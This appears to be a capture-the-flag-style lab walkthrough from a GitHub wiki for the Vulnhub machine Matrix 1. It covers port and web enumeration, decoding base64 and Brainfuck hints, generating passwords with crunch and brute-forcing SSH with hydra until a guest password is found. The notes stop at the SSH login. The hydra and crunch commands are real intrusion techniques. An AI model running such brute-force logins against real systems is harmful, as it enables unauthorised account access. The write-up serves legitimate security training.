Matrix 1 Walkthrough - WireGhost/Vulnhub-Machine-Matrix-1-Walkthrough GitHub Wiki

Vulnhub Walkthrough on Matrix 1

Spoiler Alert: Do Not continue reading if you are trying to root this on your own. Having said that, this is a newer box & not much out there, so if you find yourself stuck at some point, perhaps this may help. Done without use of Metasploit, as in prep style for OSCP. Working on this with the images (not showing) & cleaning it up. Bare with me, I'll tidy it up. These are just from my notes.

Victim IP at 192.168.239.146

My IP at 192.168.239.130

On the start this looks like fun:

PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.7 (protocol 2.0) 80/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14) 31337/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14)

Reconscan: which really comes in handy, but I probably need to examine the code and my folder links.

root@kali:~/oscp-master/recon_enum# python reconscan.py 192.168.239.146

!!!! RECON SCAN !!!!!

!!!! A multi-process service scanner !!!!!

!!!! dirb, nikto, ftp, ssh, mssql, pop3, tcp !!!!!

!!!! udp, smtp, smb !!!!!

INFO: No folder was found for 192.168.239.146. Setting up folder. INFO: Folder created here: ../reports/192.168.239.146 INFO: Added pentesting templates: ../reports/192.168.239.146 INFO: Running general TCP/UDP nmap scans for 192.168.239.146 nmap -sV -O 192.168.239.146 -oN '../reports/192.168.239.146/192.168.239.146.nmap' INFO: RESULT BELOW - Finished with BASIC Nmap-scan for 192.168.239.146 Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 13:28 EST Nmap scan report for 192.168.239.146 Host is up (0.00030s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.7 (protocol 2.0) 80/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14) 31337/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14) MAC Address: 00:0C:29:EF:7C:17 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.52 seconds

INFO: Writing portscan to template files: ../reports/192.168.239.146/mapping-linux.md
../reports/192.168.239.146/mapping-windows.md INFO: Detected UDP on 192.168.239.146 nmap -Pn -A -sC -sU -T 3 --top-ports 200 -oN '../reports/192.168.239.146/udp_192.168.239.146.nmap' 192.168.239.146 INFO: Detected SSH on 192.168.239.146:22 INFO: Writing ssh-connect to template files: ../reports/192.168.239.146/mapping-linux.md
../reports/192.168.239.146/mapping-windows.md nmap -sV -Pn -p 22 --script=ssh-auth-methods,ssh-hostkey,ssh-run,sshv1 -oN '../reports/192.168.239.146/ssh_192.168.239.146.nmap' 192.168.239.146 INFO: RESULT BELOW - Finished with SSH-Nmap-scan for 192.168.239.146 Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 13:28 EST NSE: [ssh-run] Failed to specify credentials and command to run. Nmap scan report for 192.168.239.146 Host is up (0.00028s latency).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1.06 seconds

INFO: RESULT BELOW - Finished with UDP-Nmap scan for 192.168.239.146 Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 13:28 EST Nmap scan report for 192.168.239.146 Host is up (0.00038s latency). Not shown: 199 closed ports PORT STATE SERVICE VERSION 68/udp open|filtered dhcpc MAC Address: 00:0C:29:EF:7C:17 (VMware) Too many fingerprints match this host to give specific OS details Network Distance: 1 hop

TRACEROUTE HOP RTT ADDRESS 1 0.38 ms 192.168.239.146

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 317.78 seconds

INFO: CHECK FILE - Finished with UNICORNSCAN for 192.168.239.146 root@kali:~/oscp-master/recon_enum#

Nikto

root@kali:~# nikto -h 192.168.239.146

Nikto v2.1.6

Target IP: 192.168.239.146
Target Hostname: 192.168.239.146
Target Port: 80
Start Time: 2018-11-08 13:38:37 (GMT-5)

Server: SimpleHTTP/0.6 Python/2.7.14
The anti-clickjacking X-Frame-Options header is not present.
The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
No CGI Directories found (use '-C all' to force check all possible dirs)
SimpleHTTP/0.6 appears to be outdated (current is at least 1.2)
ERROR: Error limit (20) reached for host, giving up. Last error:
Scan terminated: 15 error(s) and 4 item(s) reported on remote host
End Time: 2018-11-08 13:38:43 (GMT-5) (6 seconds)

1 host(s) tested

*********************************************************************
Portions of the server's headers (Python/2.7.14) are not in
the Nikto database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)? y

The anti-clickjacking X-Frame-Options header is not present.
The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
ERROR 302: Update failed, please notify [email protected] of this code. root@kali:~#

SSH brute on Hydra not yielding after a fair bit, so.

dirb yields

Got a binary "gitkeep" no strings though>

     -Minsoon Template 1.0 - Mar 16, 2018
 ------------------------------------------------------------------------
 -Designed & coded by MegaDrupal
 -Websites:  http://www.megadrupal.com -  Email: [email protected]

and Drupal?

And otf file "FileAwesome.otf"

Strings doesn’t show anything useful here.

Tried Dirbuster again, for kicks.

"root@kali:~# dirbuster Starting OWASP DirBuster 1.0-RC1 Nov 08, 2018 1:44:34 PM org.apache.commons.httpclient.HttpMethodDirector executeWithRetry INFO: I/O exception (java.net.ConnectException) caught when processing request: Connection refused (Connection refused) Nov 08, 2018 1:44:34 PM org.apache.commons.httpclient.HttpMethodDirector executeWithRetry INFO: Retrying request Nov 08, 2018 1:44:54 PM org.apache.commons.httpclient.HttpMethodDirector executeWithRetry INFO: I/O exception (java.net.ConnectException) caught when processing request: Connection refused (Connection refused) Nov 08, 2018 1:44:54 PM org.apache.commons.httpclient.HttpMethodDirector executeWithRetry INFO: Retrying request Starting dir/file list based brute forcing Dir found: / - 200 Dir found: /assets/ - 200 Dir found: /assets/vendors/ - 200 Dir found: /assets/vendors/_jquery/ - 200 File found: /assets/vendors/_jquery/jquery.min.js - 200 Dir found: /assets/vendors/jquery.countdown/ - 200 File found: /assets/vendors/jquery.countdown/jquery.countdown.min.js - 200 Dir found: /assets/vendors/flat-surface-shader/ - 200 File found: /assets/vendors/flat-surface-shader/fss.min.js - 200 Dir found: /assets/css/ - 200 Dir found: /assets/vendors/particles.js/ - 200 Dir found: /assets/fonts/ - 200 Dir found: /assets/vendors/bootstrap/ - 200 Dir found: /assets/img/ - 200 Dir found: /assets/vendors/quietflow/ - 200 File found: /assets/vendors/particles.js/particles.js - 200 Dir found: /assets/js/ - 200 Dir found: /assets/vendors/waterpipe/ - 200 Dir found: /assets/vendors/swiper/ - 200 File found: /assets/vendors/waterpipe/waterpipe.js - 200 Dir found: /assets/vendors/vegas/ - 200 File found: /assets/vendors/quietflow/quietflow.min.js - 200 Dir found: /assets/vendors/YTPlayer/ - 200 File found: /assets/vendors/YTPlayer/jquery.mb.YTPlayer.min.js - 200 File found: /assets/css/main.css - 200 File found: /assets/vendors/bootstrap/grid.css - 200 File found: /assets/vendors/vegas/vegas.min.js - 200 Dir found: /assets/fonts/fontawesome/ - 200 File found: /assets/js/main.js - 200 File found: /assets/img/.gitkeep - 200 File found: /assets/vendors/swiper/swiper.css - 200 File found: /assets/vendors/vegas/vegas.min.css - 200 Dir found: /assets/vendors/YTPlayer/css/ - 200 File found: /assets/vendors/swiper/swiper.jquery.js - 200 File found: /assets/fonts/fontawesome/font-awesome.min.css - 200 Dir found: /assets/fonts/fontawesome/fonts/ - 200 File found: /assets/vendors/YTPlayer/css/jquery.mb.YTPlayer.min.css - 200 File found: /assets/fonts/fontawesome/fonts/fontawesome-webfont.eot - 200 File found: /assets/fonts/fontawesome/fonts/fontawesome-webfont.svg - 200 File found: /assets/fonts/fontawesome/fonts/fontawesome-webfont.ttf - 200 File found: /assets/fonts/fontawesome/fonts/fontawesome-webfont.woff - 200 File found: /assets/fonts/fontawesome/fonts/fontawesome-webfont.woff2 - 200 File found: /assets/fonts/fontawesome/fonts/FontAwesome.otf - 200 Nov 08, 2018 1:45:16 PM org.apache.commons.httpclient.HttpMethodDirector executeWithRetry INFO: I/O exception (java.net.ConnectException) caught when processing request: Connection refused (Connection refused) Nov 08, 2018 1:45:16 PM org.apache.commons.httpclient.HttpMethodDirector executeWithRetry INFO: Retrying request WARNING: An illegal reflective access operation has occurred WARNING: Illegal reflective access by com.jgoodies.looks.common.RenderingUtils (file:/usr/share/dirbuster/lib/looks-2.2.0.jar) to method sun.swing.SwingUtilities2.drawStringUnderlineCharAt(javax.swing.JComponent,java.awt.Graphics,java.lang.String,int,int,int) WARNING: Please consider reporting this to the maintainers of com.jgoodies.looks.common.RenderingUtils WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations WARNING: All illegal access operations will be denied in a future release Dir found: /assets/ - 200 Dir found: /assets/css/ - 200 Dir found: /assets/vendors/YTPlayer/css/ - 200 Dir found: /assets/fonts/ - 200 Dir found: /assets/fonts/fontawesome/fonts/ - 200 Dir found: /assets/img/ - 200 Dir found: /assets/js/ - 200 Dir found: /assets/vendors/ - 200 DirBuster Stopped"

https://i.imgur.com/F7DC4w9.png

A lot, but not much that screams at me. I did try a lot and that was a rabbit hole in retrospect.

Trying to hydra this to see if any common obvious Matrix names jump out:

root@kali:~# hydra -l neo -P /usr/share/wordlists/fasttrack.txt -f 192.168.239.146 -s 22 ssh

And one with user as Morpheus: But nothing! Inspecting Elements on port 31337, there’s a message:

https://i.imgur.com/z8giZ8R.png

Dl'd the Bunny pic because it says to follow the White Rabbit, but no hidden message.

https://i.imgur.com/j3auAso.png

Inspected element on basic port 31337 And found this:

https://i.imgur.com/sRhJrHi.png

OK, so inspecting Element pulling Base64 found this:

echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix

from this: ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=

I screwed up for a while chasing that white rabbit phrase! Tried Cipher.matrix on 31337/cipher.matrix and nothing, then I realized "Cypher" not Cipher.

https://i.imgur.com/JQd0xx5.png

Got a bin file. So I'll string it.

Ran Strings on the Cypher.matrix binary.

https://i.imgur.com/MW423O9.png

root@kali:~# strings Cypher.matrix +++++ ++++[ ->+++ +++++ +<]>+ +++++ ++.<+ +++[- >++++ <]>++ ++++. +++++ +.<++ +++++ ++[-> ----- ----< ]>--- -.<++ +++++ +[->+ +++++ ++<]> +++.- -.<++ +[->+ ++<]> ++++. <++++ ++++[ ->--- ----- <]>-- ----- ----- --.<+ +++++ ++[-> +++++ +++<] >++++ +.+++ +++++ +.+++ +++.< +++[- >---< ]>--- ---.< +++[- >+++< ]>+++ +.<++ +++++ ++[-> ----- ----< ]>-.< +++++ +++[- ++++ ++++< ]>+++ +++++ +.+++ ++.++ ++++. ----- .<+++ +++++ [->-- ----- -<]>- ----- ----- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ +.<++ +[->- --<]> ---.< ++++[ ->+++ +<]>+ ++.-- .---- ----- .<+++ [->++ +<]>+ +++++ .<+++ +++++ +[->- ----- ---<] >---- ---.< +++++ +++[- >++++ ++++< ]>+.< ++++[ ->+++ +<]>+ +.<++ +++++ ++[-> ----- ----< ]>--. <++++ ++++[ ->+++ +++++ <]>++ +++++ .<+++ [->++ +<]>+ ++++. <++++ [->-- --<]> .<+++ [->++ +<]>+ ++++. +.<++ +++++ +[->- ----- --<]> ----- ---.< +++[- >---< ]>--- .<+++ +++++ +[->+ +++++ +++<] >++++ ++.<+ ++[-> ---<] >---- -.<++ +[->+ ++<]> ++.<+ ++[-> ---<] >---. <++++ ++++[ ->--- ----- <]>-- ----- -.<++ +++++ +[->+ +++++ ++<]> +++++ +++++ +++++ +.<++ +[->- --<]> ----- -.<++ ++[-> ++++< ]>++. .++++ .---- ----. +++.< +++[- >---< ]>--- --.<+ +++++ ++[-> ----- ---<] >---- .<+++ +++++ [->++ +++++ +<]>+ +++++ +++++ .<+++ ++++[ ->--- ----< ]>--- ----- -.<++ +++++ [->++ +++++ <]>++ +++++ +++.. <++++ +++[- >---- ---<] >---- ----- --.<+ +++++ ++[-> +++++ +++<] ++.< +++++ [->-- ---<] >-..< +++++ +++[- >---- ----< ]>--- ----- ---.- --.<+ +++++ ++[-> +++++ +++<] >++++ .<+++ ++[-> +++++ <]>++ +++++ +.+++ ++.<+ ++[-> ---<] >---- --.<+ +++++ [->-- ----< ]>--- ----. <++++ +[->- ----< ]>-.< +++++ [->++ +++<] >++++ ++++. <++++ +[->+ ++++< ]>+++ +++++ +.<++ ++[-> ++++< ]>+.+ .<+++ +[->- ---<] >---- .<+++ [->++ +<]>+ +..<+ ++[-> +++<] >++++ .<+++ +++++ [->-- ----- -<]>- ----- ----- --.<+ ++[-> ---<] >---. <++++ ++[-> +++++ +<]>+ ++++. <++++ ++[-> ----- -<]>- ----. <++++ ++++[ ->+++ +++++ <]>++ ++++. +++++ ++++. +++.< +++[- >---< ]>--. --.<+ ++[-> +++<] >++++ ++.<+ +++++ +++[- >---- ----- <]>-- -.<++ +++++ +[->+ +++++ ++<]> +++++ +++++ ++.<+ ++[-> ---<] >--.< ++++[ ->+++ +<]>+ +.+.< +++++ ++++[ ->--- ----- -<]>- --.<+ +++++ +++[- >++++ +++++ <]>++ +.+++ .---- ----. <++++ ++++[ ->--- ----- <]>-- ----- ----- ---.< +++++ +++[- >++++ ++++< ]>+++ .++++ +.--- ----. <++++ [->++ ++<]> +.<++ ++[-> ----< ]>-.+ +.<++ ++[-> ++++< ]>+.< +++[- >---< ]>--- ---.< +++[- >+++< ]>+++ +.+.< +++++ ++++[ ->--- ----- -<]>- -.<++ +++++ ++[-> +++++ ++++< ]>++. ----. <++++ ++++[ ->--- ----- <]>-- ----- ----- ---.< +++++ +[->+ +++++ <]>++ +++.< +++++ +[->- ----- <]>-- ---.< +++++ +++[- >++++ ++++< ]>+++ +++++ .---- ---.< ++++[ ->+++ +<]>+ ++++. <++++ [->-- --<]> -.<++ +++++ +[->- ----- --<]> ----- .<+++ +++++ +[->+ +++++ +++<] >+.<+ ++[-> ---<] >---- .<+++ [->++ +<]>+ +.--- -.<++ +[->- --<]> --.++ .++.- .<+++ +++++ [->-- ----- -<]>- ---.< +++++ ++++[ ->+++ +++++ +<]>+ +++++ .<+++ [->-- -<]>- ----. <+++[ ->+++ <]>++ .<+++ [->-- -<]>- --.<+ +++++ ++[-> ----- ---<] >---- ----. <++++ +++[- >++++ +++<] >++++ +++.. <++++ +++[- ---- ---<] >---- ---.< +++++ ++++[ ->+++ +++++ +<]>+ ++.-- .++++ +++.< +++++ ++++[ ->--- ----- -<]>- ----- --.<+ +++++ +++[- >++++ +++++ <]>++ +++++ +.<++ +[->- --<]> -.+++ +++.- --.<+ +++++ +++[- >---- ----- <]>-. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ .++++ +++++ .<+++ +[->- ---<] --.+ +++++ ++.<+ +++++ ++[-> ----- ---<] >---- ----- --.<+ +++++ ++[-> +++++ +++<] >+.<+ ++[-> +++<] >++++ .<+++ [->-- -<]>- .<+++ +++++ [->-- ----- -<]>- ---.< +++++ +++[- >++++ ++++< ]>+++ +++.+ ++.++ +++.< +++[- ---< ]>-.< +++++ +++[- >---- ----< ]>--- -.<++ +++++ +[->+ +++++ ++<]> +++.< +++[- >+++< ]>+++ .+++. .<+++ [->-- -<]>- ---.- -.<++ ++[-> ++++< ]>+.< +++++ ++++[ ->--- ----- -<]>- --.<+ +++++ +++[- >++++ +++++ <]>++ .+.-- .---- ----- .++++ +.--- ----. <++++ ++++[ ->--- ----- <]>-- ----- .<+++ +++++ [->++ +++++ +<]>+ +++++ +++++ ++++. ----- ----. <++++ ++++[ ->--- ----- <]>-- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ ++++. <+++[ ->--- <]>-- ----. <++++ [->++ ++<]> ++..+ +++.- ----- --.++ +.<++ +[->- --<]> ----- .<+++ ++++[ ->--- ----< ]>--- --.<+ ++++[ ->--- --<]> ----- ---.- --.<

Well... after looking this up - split brain/ Or "Brainfuck".

Which decrypts to:

"You can enter into matrix as guest, with password k1ll0rXX Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password"

https://i.imgur.com/qyBGcKP.png

Went to https://www.dcode.fr/brainfuck-language

Tried another site, but the string was too long for their server to handle ?

So k1ll0rXX as a guest user, but the last two "XX" are unk, sooo.....crunch?

Using the cmd : crunch 8 8 -t k1ll0r%@-o k1ll0r.txt

So we'll try Hydra to Brute on ssh: -user guest?

cmd: root@kali:~# hydra -l guest -P k1ll0r.txt 192.168.239.146 ssh -V

Gives the verbose output.

https://i.imgur.com/5NklnMt.png

nice: so: 22][ssh] host: 192.168.239.146 login: guest password: k1ll0r7n

so now we ssh [email protected] and try k1ll0r7n as the password.

https://i.imgur.com/vPsQn1n.png